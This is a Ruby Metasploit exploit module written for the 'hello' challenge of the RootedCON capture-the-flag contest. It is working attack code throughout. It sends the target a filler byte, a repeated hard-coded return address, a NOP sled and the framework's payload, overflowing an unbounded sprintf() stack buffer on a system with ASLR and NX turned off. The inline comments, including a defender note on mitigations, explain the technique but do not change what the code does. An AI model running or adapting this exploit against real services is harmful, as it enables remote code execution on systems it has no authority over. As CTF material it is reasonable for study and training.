#
#
# Custom Metasploit exploit for the RootedCON CTF 'hello' challenge
# Written by Eloi Sanfelix
#
#
require 'msf/core'

# Metasploit remote module for the RootedCON CTF 'hello' challenge service.
#
# Per the module description, the target copies input with sprintf() into a
# stack buffer and runs without ASLR or NX. The module therefore relies on a
# single hard-coded address and on injected bytes being executable.
#
# Defender note: each of those assumptions is a mitigation point. Enabling
# ASLR or NX, or replacing the unbounded sprintf() with a length-checked
# call, breaks the technique as written here.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    module_info = {
      'Name'           => 'RootedCON Capture The Flag \'hello\' challenge',
      'Description'    => %q{ Exploit for the 'hello' exploitation challenge from the
						RootedCON CTF. Simple buffer overflow using sprintf(), 
						no ASLR, no NX, just plain-good-old stack smashing.
                                             },
      'Author'         => ['esanfelix'],
      'Version'        => '$Revision: 1.0 $',
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      # Only one target is declared, with no per-target options.
      'Targets'        => [
        ['My ubuntu linux', {}]
      ],
      'DefaultTarget'  => 0
    }
    super(update_info(info, module_info))

    # RPORT defaults to 7878; presumably the port the challenge service
    # listened on -- confirm against the challenge setup.
    default_port = Opt::RPORT(7878)
    register_options([default_port], self.class)
  end

  # Connects, sends one request built from fixed-size parts, disconnects,
  # then hands control to the framework's payload handler.
  def exploit
    connect

    # 80 copies of one hard-coded 32-bit little-endian value ('V').
    # NOTE(review): presumably a stack address on the author's own machine;
    # it is only meaningful where the address layout is not randomised.
    return_addr_block = [0xbffff380].pack('V') * 80
    # 300 bytes of 0x90 placed ahead of the encoded payload.
    nop_block = "\x90" * 300

    # One leading filler byte precedes the repeated address
    # (presumably for alignment -- the source does not say).
    request = "A" + return_addr_block + nop_block + payload.encoded

    sock.put(request)
    disconnect
    handler
  end
end

